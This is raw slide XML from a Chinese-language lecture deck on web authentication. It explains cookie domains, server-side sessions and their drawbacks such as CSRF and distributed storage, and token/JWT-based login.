                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="3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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495935" y="1282065"/>
            <a:ext cx="10301605" cy="46621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汉仪雅酷黑 85W" panose="020B0904020202020204" charset="-122"/>
              <a:ea typeface="汉仪正圆-55W" panose="00020600040101010101" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426085" y="1179830"/>
            <a:ext cx="10265410" cy="4764405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>域：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“域”（Domain）是指可以访问特定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie 的网站或子域名。它用于定义 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie 的作用范围，决定了哪些主机可以读取和使用这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>设置域</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：当一个网站设置 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie 时，可以指定一个 Domain 属性。如果没有指定，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie 只能被创建它的那个域访问。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>子域名</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：如果设置了一个父域名（例如 .example.com），则所有该域下的子域（如 www.example.com 和 api.example.com）都可以访问这个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie。如果只设置为 www.example.com，则只有这个特定的子域能够访问这个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全性考虑</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：正确设置域可以防止其他不相关的子域访问敏感数据，从而增强安全性。</a:t>
            </a:r>
            <a:endParaRPr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82245" y="1432560"/>
            <a:ext cx="11758295" cy="2407920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="182245" y="4010660"/>
            <a:ext cx="11697335" cy="2303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346075" y="1830070"/>
            <a:ext cx="11231245" cy="3893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195580" y="1256665"/>
            <a:ext cx="11586210" cy="5172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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122680" y="2045335"/>
            <a:ext cx="9956800" cy="3691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汉仪雅酷黑 85W" panose="020B0904020202020204" charset="-122"/>
              <a:ea typeface="汉仪正圆-55W" panose="00020600040101010101" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1472565" y="2239010"/>
            <a:ext cx="9246235" cy="2806700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是指客户端与服务端之间的互动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是从与服务器的交互开始，到结束交互为止。会话通常用于维持用户状态和数据，尤其是在多次请求中。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开发中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通常是指以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Key-Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>存储的一种在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务端存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户状态信息的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>机制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="session1 (2)"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1604645" y="4189095"/>
            <a:ext cx="4233545" cy="1424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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122680" y="2045335"/>
            <a:ext cx="9956800" cy="3691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汉仪雅酷黑 85W" panose="020B0904020202020204" charset="-122"/>
              <a:ea typeface="汉仪正圆-55W" panose="00020600040101010101" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1472565" y="2239010"/>
            <a:ext cx="9246235" cy="2806700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>首先明确一点，Session和Cookie没有直接的关系，可以认为Cookie只是实现Session机制的一种方法途径而已，没有Cookie还可以用别的方法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ession的实现主要两种方式：cookie与url重写，而cookie是首选方式，因为各种现代浏览器都默认开通cookie功能，但是每种浏览器也都有允许cookie失效的设置，因此对于Session机制来说还需要一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>备用方案</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6877050" y="4450715"/>
            <a:ext cx="4020185" cy="1183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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122680" y="2045335"/>
            <a:ext cx="9956800" cy="3691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汉仪雅酷黑 85W" panose="020B0904020202020204" charset="-122"/>
              <a:ea typeface="汉仪正圆-55W" panose="00020600040101010101" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1472565" y="2239010"/>
            <a:ext cx="9246235" cy="2806700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>交互：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果说Cookie机制是通过检查客户身上的“通行证”来确定客户身份的话，那么Session机制就是通过检查服务器上的“客户明细表”来确认客户身份。Session相当于程序在服务器上建立的一份客户档案，客户来访的时候只需要查询客户档案表就可以了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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623570" y="1842770"/>
            <a:ext cx="10344150" cy="3876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引言</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104900" y="1871345"/>
            <a:ext cx="9893300" cy="1558290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>传统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>机制弊端：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、在分布式系统中信息的共享问题。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、在面对海量用户时巨大的存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>压力。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全问题；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代替方案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> SpringSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>；但是又引入的新的中间件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>又需要对该中间件做集群等处理防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>宕机。</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-JWT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420370" y="1309370"/>
            <a:ext cx="11597640" cy="2377440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>oken的意思是“令牌”，其实就是后端将用户信息进行非对称加密，然后将加密后的内容保存在前端，当发送请求的时候带上这个令牌来实现身份验证。大致的过程是第一次登录，用户输入用户名和密码，服务器验证无误后会对用户的信息进行非对称加密生成一个令牌返回给前端，前端可以存入 cookie 或者 localStorage 等，以后每次发送请求带上这个令牌，后端通过对令牌的验证来识别用户的身份以及请求的合法性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Token避免了Session机制带来的海量信息存储问题，也避免了Cookie机制的一些安全性问题，属于典型的时间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>换空间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的思路。在现代高</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>并发、跨平</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>台场景、跨域访问等场景有广泛的用途。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2228850" y="3395345"/>
            <a:ext cx="6885305" cy="3235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前端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612843" y="846306"/>
            <a:ext cx="184731" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 2621"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950631" y="1748624"/>
            <a:ext cx="279459" cy="2794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7" tIns="19047" rIns="19047" bIns="19047" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="228600">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560" noProof="1">
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="Arial" panose="020B0604020202020204"/>
              <a:cs typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="六边形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="739219" y="1653278"/>
            <a:ext cx="461175" cy="397565"/>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224305" y="1553692"/>
            <a:ext cx="775195" cy="49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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>示例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
